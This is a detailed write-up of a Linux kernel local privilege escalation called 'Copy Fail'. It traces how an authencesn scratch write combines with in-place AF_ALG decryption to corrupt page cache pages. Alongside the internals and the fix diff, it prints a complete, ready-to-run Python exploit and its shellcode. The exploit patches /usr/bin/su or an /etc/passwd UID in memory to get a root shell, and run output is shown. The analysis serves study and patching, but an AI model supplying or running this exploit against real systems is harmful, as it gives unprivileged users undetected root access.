LPE dropped yesterday. They’re calling it Copy Fail. A logic bug in the kernel’s crypto subsystem: 732 bytes of Python, unprivileged, root on every major distro shipped since 2017. No race. No spray, which automatically makes it an interesting one. I know there’ll be a lot of people covering this, but I couldn’t help it, I had to do it.

I pulled the disclosure and the kernel source and traced the whole thing from the vulnerable codepath down to the write primitive. Three commits across six years, three different subsystems, three different authors. None of them buggy on their own. Together they give you a controlled 4-byte write into the page cache of any readable file on the system. You pick the file, you pick the offset, you pick the value. Patch a setuid binary in memory, execve() it, pop root.

Before we get into the exploit we need to understand the kernel internals that make this work. There’s no shortcut here: the bug won’t make sense if you don’t get how the page cache, AF_ALG sockets, and scatterlists interact. So we’re gonna walk through all of it.

Internals

Every file you read on Linux goes through the page cache. The kernel keeps recently accessed file data in memory as 4KB pages so it doesn’t have to hit disk every time. execve() loads binaries from the page cache. Corrupt a page, every process that reads that file sees your version. The on-disk file stays clean.

The page cache is global. Shared across all processes, all users, all containers on the same host. One page cache per physical machine.

Process A (uid=1001)     Process B (root)     Container C
    |                        |                    |
    |  read("/usr/bin/su")   |  execve("/usr/bin/su")
    |                        |                    |
    v                        v                    v
+----------------------------------------------------------+
|                     PAGE CACHE                           |
|  /usr/bin/su: [page 0] [page 1] [page 2] ...             |
+----------------------------------------------------------+
                         |
                    (on demand)
                         |
                    +----------+
                    |   DISK   |
                    +----------+

Write into page 0 of /usr/bin/su in the page cache, the next execve("/usr/bin/su") loads your modified version. su is setuid-root. Your code runs as UID 0. That’s the whole game. And the kernel never marks the corrupted page dirty for writeback. sha256sum /usr/bin/su still matches. rpm -V passes. AIDE sees nothing. But the version in memory, the one that actually executes, is yours.

So how do we get page cache pages somewhere we can write to them? splice(). It moves data between a file descriptor and a pipe without copying. It passes page references. When you splice a file into a pipe, the pipe holds direct references to the kernel’s page cache pages for that file. Not copies. The same physical pages.

int fd = open("/usr/bin/su", O_RDONLY);
int pipefd[2];
pipe(pipefd);

loff_t off = 0;                             /* file offset to splice from */
splice(fd, &off, pipefd[1], NULL, len, 0);  /* len: bytes to move */

After this, pipefd[0] holds references to the actual pages backing /usr/bin/su. Now splice from the pipe into an AF_ALG crypto socket. Those pages land in the kernel’s crypto scatterlist. The crypto subsystem is holding direct references to a setuid binary’s cached content. That’s our entry point.

AF_ALG exposes the kernel’s crypto subsystem to userspace via sockets. No CAP_SYS_ADMIN. No CAP_NET_RAW. Just socket() and bind():

int fd = socket(AF_ALG, SOCK_SEQPACKET, 0);
struct sockaddr_alg sa = {
    .salg_family = AF_ALG,
    .salg_type   = "aead",
    .salg_name   = "authencesn(hmac(sha256),cbc(aes))"
};
bind(fd, (struct sockaddr *)&sa, sizeof(sa));

Loads the requested crypto algorithm and gives you a file descriptor to feed data into. Data goes in via sendmsg() (AAD and control metadata) and splice() (ciphertext/plaintext). recvmsg() triggers the operation. When data arrives via splice(), the TX scatterlist holds direct references to those same pages. The scatterlist is how the kernel represents discontiguous memory for crypto: each entry points to a page, an offset, and a length:

struct scatterlist {
    unsigned long page_link;
    unsigned int  offset;
    unsigned int length;
};

Chain them with sg_chain() and you get a single logical buffer from scattered pages. For AEAD crypto, there are two: req->src (input) and req->dst (output). Out-of-place, they point to different memory. In-place, req->src == req->dst. If that scatterlist contains file-backed pages, writes to the output go directly into the page cache.
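To make the walk concrete, here’s a toy Python model of a chained scatterlist. All names are mine and real scatterwalk code handles page mapping and chaining very differently, but the addressing idea is the same: each entry is a (page, offset, length) triple and a logical offset walks across entries.

```python
# Toy model of a scatterlist walk. Entries are (page, offset, length),
# chained into one logical byte range. Not kernel code -- just the idea.
def map_and_copy(sgl, buf, logical_off, n, write):
    """Copy n bytes between buf and the logical range at logical_off."""
    pos = 0
    copied = 0
    for page, off, length in sgl:
        if logical_off < pos + length and copied < n:
            start = max(logical_off - pos, 0) + off
            take = min(length - (start - off), n - copied)
            if write:
                page[start:start+take] = buf[copied:copied+take]
            else:
                buf[copied:copied+take] = page[start:start+take]
            copied += take
        pos += length
    return copied

page_a = bytearray(b"AAAAAAAA")
page_b = bytearray(b"BBBBBBBB")
sgl = [(page_a, 0, 8), (page_b, 0, 8)]   # two chained "pages"

out = bytearray(4)
map_and_copy(sgl, out, 6, 4, write=False)   # read across the page boundary
print(bytes(out))                            # b'AABB'
```

Flip `write=True` and the same walk mutates the underlying pages, which is exactly what matters once those pages are file-backed.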

Now, AEAD decryption looks like this:

Input:  AAD || Ciphertext || Tag
Output: AAD || Plaintext

Output is always smaller than input (no tag). The API guarantees the algorithm writes at most assoclen + cryptlen - authsize bytes to the destination. Every standard AEAD in the kernel respects this. GCM, CCM, regular authenc all stay within bounds.

One doesn’t.

authencesn is an AEAD wrapper for IPsec Extended Sequence Numbers (ESN, RFC 4303). IPsec uses 64-bit sequence numbers split into seqno_hi (bytes 0–3 of the AAD) and seqno_lo (bytes 4–7). The wire format only carries seqno_lo; seqno_hi is implicit.

For HMAC computation, authencesn needs to rearrange these bytes. It does this by using the caller’s destination buffer as scratch space. In crypto_authenc_esn_decrypt():

scatterwalk_map_and_copy(tmp, src, 0, 8, 0);

if (src == dst) {
    scatterwalk_map_and_copy(tmp, dst, 4, 4, 1);
    scatterwalk_map_and_copy(tmp + 1, dst, assoclen + cryptlen, 4, 1);
    // ...
}

That third scatterwalk_map_and_copy writes 4 bytes at offset assoclen + cryptlen in the destination scatterlist. Past the AEAD output boundary. The algorithm is writing into memory it doesn’t own.

The value written, tmp + 1, is seqno_lo: bytes 4–7 of the AAD. You control the AAD via sendmsg(). Full control over the 4 bytes.

After the HMAC runs (and fails, because the ciphertext is fabricated), crypto_authenc_esn_decrypt_tail() reads seqno_lo back to reconstruct the AAD:

if (src == dst) {
    scatterwalk_map_and_copy(tmp, dst, 4, 4, 0);
    scatterwalk_map_and_copy(tmp + 1, dst, assoclen + cryptlen, 4, 0);
    scatterwalk_map_and_copy(tmp, dst, 0, 8, 1);
}

It reads the value back from dst[assoclen + cryptlen] and restores the AAD. But the original bytes at that position are gone. The 4-byte overwrite persists even though the HMAC fails and recvmsg() returns an error.

No other AEAD in the kernel does this. GCM, CCM, regular authenc all stay within the output boundary. authencesn alone writes past it.

How It Broke

This bug didn’t come from one commit. It came from three, spread across roughly six years, in different subsystems, by different authors.

In 2011, a5079d084f8b added authencesn for IPsec ESN. The scratch write was there from day one but the only caller was the kernel’s own xfrm layer, which always passed properly sized buffers. Nobody else could reach it.

In 2015, 104880a6b470 refactored authencesn to the new AEAD interface. The assoclen + cryptlen offset write showed up here. Still didn’t matter: AF_ALG kept req->src and req->dst as separate scatterlists. Page cache pages lived in src. The scratch write hit dst, which was your recvmsg buffer. Nothing interesting.

Then in 2017, 72548b093ee3 landed. Stephan Mueller optimized algif_aead.c to do AEAD operations in-place. The idea was simple: instead of allocating a separate output buffer, copy the AAD and ciphertext from the TX SGL into the RX SGL, then run the crypto operation with src == dst. Saves memory, avoids a copy for the bulk data.

But for decryption, the tag bytes at the end of the input need to stay in the source scatterlist for verification. So instead of copying them, the code chains the TX SGL’s tag pages onto the end of the RX SGL using sg_chain():

TX SGL: AAD || CT || Tag
         |     |     ^
         | copy|     | sg_chain()
         v     v     |
RX SGL: AAD || CT ---+

The RX SGL now has two regions: your recvmsg buffer (copied AAD + CT), followed by the chained tag pages. Those tag pages are the original page cache pages from splice(). They were never copied. They’re still the same physical pages backing the target file.

Then the code sets req->src = req->dst. Both point to this combined chain. When authencesn runs and writes at dst[assoclen + cryptlen], the scatterwalk walks past the RX buffer into the chained tag region. kmap_local_page() maps the page cache page. Four bytes go in. The kernel just wrote into the cached copy of whatever file you spliced.
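In a toy Python model (all names mine, pages as bytearrays), the difference between copying and chaining is exactly object identity: the copied AAD+CT live in your buffer, the chained tag page is the same object the splice put in the TX SGL.

```python
# Toy model -- "pages" are bytearrays. Chaining shares the object; copying doesn't.
assoclen, ctlen = 8, 16                            # AAD + ciphertext (tag excluded)

page_cache_tag = bytearray(b"TAGBYTESTAGBYTES")    # stands in for a page cache page
rx_buf = bytearray(assoclen + ctlen)               # your recvmsg buffer (copied AAD+CT)

# RX SGL: the copied buffer, then the *same* tag page chained on -- never copied.
rx_sgl = [rx_buf, page_cache_tag]

def write_at(sgl, off, data):
    # Walk the chain, write data at logical offset off (fits in one segment here).
    for seg in sgl:
        if off < len(seg):
            seg[off:off+len(data)] = data
            return
        off -= len(seg)

seqno_lo = b"\x90\x90\x90\x90"                     # attacker-controlled AAD[4:8]
write_at(rx_sgl, assoclen + ctlen, seqno_lo)       # scratch write, past the RX buffer

print(page_cache_tag[:4])   # bytearray(b'\x90\x90\x90\x90') -- the shared page changed
```

The write at assoclen + ctlen falls one byte past the RX buffer, so the walk lands it in the chained page. Your buffer is untouched; the shared page isn’t.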

The Primitive

You control three things:

Which file. Any file readable by you. splice() only requires read permission. /usr/bin/su is world-readable and setuid-root on every major distribution.

Which offset. The tag region corresponds to the last authsize bytes of the spliced file data. By choosing the splice file offset, splice length, and assoclen, you determine exactly which 4 bytes within the file’s page cache get overwritten. The write lands at the position corresponding to assoclen + cryptlen in the combined scatterlist, which maps to a specific offset in the target file’s page cache.

Which value. The 4-byte overwrite value is seqno_lo, bytes 4–7 of the AAD. You construct the AAD in sendmsg(). Full control.

You get:
  file   = open("/usr/bin/su", O_RDONLY)     -> which file
  offset = splice offset + assoclen tuning   -> which 4 bytes
  value  = AAD[4:8] in sendmsg()             -> what gets written
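Under one consistent parameterization, assoclen = 8, authsize = 4, splice from file offset 0 with length offset + 4 (the choices the PoC makes), the arithmetic collapses so the write lands exactly at the chosen file offset. A sketch of my reading of it:

```python
def write_target(file_off, assoclen=8, authsize=4):
    # PoC parameter choices: splice file bytes [0, file_off + 4);
    # the last authsize bytes become the chained tag region.
    splice_len = file_off + 4
    cryptlen = splice_len - authsize        # ciphertext length, tag excluded
    dst_write_off = assoclen + cryptlen     # where authencesn scribbles
    rx_copied = assoclen + cryptlen         # bytes copied into the RX buffer
    # The write lands (dst_write_off - rx_copied) bytes into the chained
    # tag region, i.e. at this offset in the target file's page cache:
    return (splice_len - authsize) + (dst_write_off - rx_copied)

print(write_target(0), write_target(100))   # 0 100
```

The delta between the write offset and the copied-buffer length is always zero with these parameters, so the overwrite hits the first tag byte, which is file offset file_off. That’s why the PoC can just loop i over the shellcode.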

The write is deterministic. The HMAC check fails (the ciphertext is garbage), recvmsg() returns -EBADMSG, but the 4-byte write into the page cache already happened. It persists. You can call this in a loop, 4 bytes at a time, and write arbitrary data into any readable file’s page cache.

That’s the primitive. Now let’s use it.

Exploit

The original PoC targets /usr/bin/su and patches shellcode into its .text section. The shellcode is tiny:

xor    eax, eax
xor    edi, edi
mov    al, 0x69        ; setuid(0)
syscall
lea    rdi, [rip+0xf]  ; "/bin/sh"
xor    esi, esi
push   0x3b
pop    rax              ; execve
cltd
syscall
xor    edi, edi
push   0x3c
pop    rax              ; exit(0)
syscall

setuid(0) -> execve("/bin/sh") -> exit(0). The shellcode is compressed with zlib and embedded in the exploit. It gets written into the .text section of /usr/bin/su in the page cache, 4 bytes at a time.

The exploit flow:

a = socket.socket(38, 5, 0)                   # AF_ALG, SOCK_SEQPACKET
a.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))

a.setsockopt(279, 1, key)                     # SOL_ALG, ALG_SET_KEY
a.setsockopt(279, 5, None, 4)                 # ALG_SET_AEAD_AUTHSIZE = 4
u, _ = a.accept()

f = os.open("/usr/bin/su", 0)                 # O_RDONLY
i = 0
while i < len(shellcode):
    c(f, i, shellcode[i:i+4])                 # one 4-byte page cache write
    i += 4

os.system("su")

Each call to c() performs one 4-byte write. Open AF_ALG socket, send AAD with the payload bytes at 4–7, splice the target file’s page cache pages in, recv() to trigger the decrypt. HMAC fails, write persists.

#!/usr/bin/env python3
import os, zlib, socket

def write_4bytes(target_fd, offset, data):
    a = socket.socket(38, 5, 0)               # AF_ALG, SOCK_SEQPACKET
    a.bind(("aead", "authencesn(hmac(sha256),cbc(aes))"))
    SOL_ALG = 279
    a.setsockopt(SOL_ALG, 1, bytes.fromhex(   # ALG_SET_KEY, authenc key format
        '0800010000000010' + '0' * 64))
    a.setsockopt(SOL_ALG, 5, None, 4)         # ALG_SET_AEAD_AUTHSIZE = 4
    u, _ = a.accept()

    splice_len = offset + 4                   # splice file bytes [0, offset+4)
    iv = b'\x00'

    u.sendmsg(
        [b"A" * 4 + data],                    # 8-byte AAD; data = AAD[4:8] = seqno_lo
        [
            (SOL_ALG, 3, iv * 4),             # ALG_SET_OP = ALG_OP_DECRYPT (0)
            (SOL_ALG, 2, b'\x10' + iv * 19),  # ALG_SET_IV: ivlen = 16, zero IV
            (SOL_ALG, 4, b'\x08' + iv * 3),   # ALG_SET_AEAD_ASSOCLEN = 8
        ],
        0x8000                                # MSG_MORE: spliced data follows
    )

    r, w = os.pipe()
    os.splice(target_fd, w, splice_len, offset_src=0)  # page cache pages -> pipe
    os.splice(r, u.fileno(), splice_len)               # pipe -> crypto TX SGL

    try:
        u.recv(8 + offset)                    # trigger the decrypt; HMAC fails...
    except:
        pass                                  # ...but the 4-byte write persists

target = os.open("/usr/bin/su", 0)            # O_RDONLY is all we need
shellcode = zlib.decompress(bytes.fromhex(
    "78daab77f57163626464800126063b0610af82c101cc7760c0040e0c160c"
    "301d209a154d16999e07e5c1680601086578c0f0ff864c7e568f5e5b7e10"
    "f75b9675c44c7e56c3ff593611fcacfa499979fac5190c0c0c0032c310d3"
))

i = 0
while i < len(shellcode):
    write_4bytes(target, i, shellcode[i:i+4]) # patch .text 4 bytes at a time
    i += 4

os.system("su")                               # run the patched setuid binary

sendmsg sets the IV, decrypt mode, and assoclen = 8. The AAD is 8 bytes: 4 junk + 4 payload. seqno_lo is what lands in the target file. splice feeds the page cache pages in. recv triggers the write. Done.

Ran this on a box running kernel 6.12.54-linuxkit. Unprivileged user xploit, UID 1337.

The LPE:

$ python3 lpe.py
[*] user=xploit  uid=1337
[*] Patching '1337' -> '0000' in page cache...
[*] getpwnam('xploit').pw_uid = 0
[+] /etc/passwd page cache now lists xploit as UID 0.

One 4-byte write. UID goes from 1337 to 0000 in the page cache. getpwnam("xploit") now returns UID 0. The on-disk /etc/passwd still reads 1337: sha256sum matches, rpm -V passes, AIDE sees nothing. Only the in-memory copy is corrupted.

su xploit, enter your own password. PAM validates against /etc/shadow (untouched), calls setuid(getpwnam("xploit").pw_uid) which is now 0. Root shell.
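For the /etc/passwd variant, the only bookkeeping is finding the byte offset of the UID field; a sketch with my own helper name, not taken from the PoC:

```python
def uid_field_offset(passwd, user):
    # Byte offset of the UID field for `user` in passwd-format data
    # (name:pw:UID:GID:...). The primitive would overwrite 4 bytes here.
    off = 0
    for line in passwd.split(b"\n"):
        fields = line.split(b":")
        if fields and fields[0] == user:
            # name + ':' + password field + ':' precede the UID
            return off + len(fields[0]) + 1 + len(fields[1]) + 1
        off += len(line) + 1                  # +1 for the newline
    return -1

sample = b"root:x:0:0:root:/root:/bin/bash\nxploit:x:1337:1337::/home/x:/bin/sh\n"
o = uid_field_offset(sample, b"xploit")
print(o, sample[o:o+4])   # 41 b'1337'
```

Feed that offset and b"0000" to the write primitive and the cached passwd entry flips, while the on-disk file never changes.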

Same primitive. Works anywhere you have a 4-digit UID.

Fix

The patch reverts algif_aead.c to out-of-place operation, removing the 2017 in-place optimization entirely. The Fixes: tag points to 72548b093ee3, confirming that the in-place design is the root cause.

The core change:

-  aead_request_set_crypt(&areq->cra_u.aead_req, rsgl_src,
+  aead_request_set_crypt(&areq->cra_u.aead_req, tsgl_src,
                          areq->first_rsgl.sgl.sgt.sgl, used, ctx->iv);

Before: req->src = rsgl_src (the RX SGL, same as req->dst). In-place. Page cache pages chained into the writable destination.

After: req->src = tsgl_src (the TX SGL, separate from req->dst). Out-of-place. Page cache pages stay in the read-only source. Writes go to your buffer only.

The entire sg_chain() mechanism that linked page cache tag pages into the writable destination scatterlist is removed. The dst_offset parameter is dropped from af_alg_pull_tsgl() and af_alg_count_tsgl(). Only the AAD copy (via memcpy_sglist) is retained.
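A toy model of the difference (same conventions as the chained-page model above, names mine): out-of-place, the authencesn scratch write still happens, but dst is your own buffer and the page cache page sitting in src never gets written.

```python
# Toy model of the fix: out-of-place operation. The page cache page stays in
# src (read-only input); dst is a plain user buffer, so the scratch write is harmless.
page_cache_tag = bytearray(b"TAG!")
src = [bytearray(24), page_cache_tag]   # TX SGL: AAD+CT, then the chained tag page
dst = [bytearray(28)]                   # separate RX buffer -- req->src != req->dst

def write_at(sgl, off, data):
    # Walk the chain, write data at logical offset off.
    for seg in sgl:
        if off < len(seg):
            seg[off:off+len(data)] = data
            return
        off -= len(seg)

write_at(dst, 24, b"\x90\x90\x90\x90")  # same scratch write, same offset
print(page_cache_tag)                   # bytearray(b'TAG!') -- untouched
```

That’s the pre-2017 behavior restored: the out-of-bounds write degrades from a page cache corruption back to a scribble in your own recvmsg buffer.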

Page Cache LPEs

Linux has had page cache privilege escalation bugs before. The progression tells you something about where kernel security is heading.

Dirty Cow (2016) was a race in the VM’s copy-on-write path. Two threads fighting over a private mapping: madvise(MADV_DONTNEED) in one, write in the other. If you win the race, your write goes to the file’s page cache instead of a private copy. Unreliable. Sometimes crashes the box. You might need to run it a dozen times.

Dirty Pipe (2022) was a flag bug. PIPE_BUF_FLAG_CAN_MERGE wasn’t cleared when a page cache page got spliced into a pipe. A write() to the pipe would merge into the page cache page. Clever, but only worked on kernels 5.8 through 5.16 and needed specific pipe buffer setup.

Copy Fail is neither a race nor a flag bug. It’s a logic flaw in how two subsystems interact: the crypto layer assumes AEAD algorithms stay within the output boundary, and authencesn doesn’t. The in-place optimization puts page cache pages where the scratch write can reach them. No timing. No version-specific tricks. Same script, every distro, every time. And the corrupted page never gets marked dirty, so on-disk integrity checks see nothing.

Each one more reliable, more portable, harder to detect.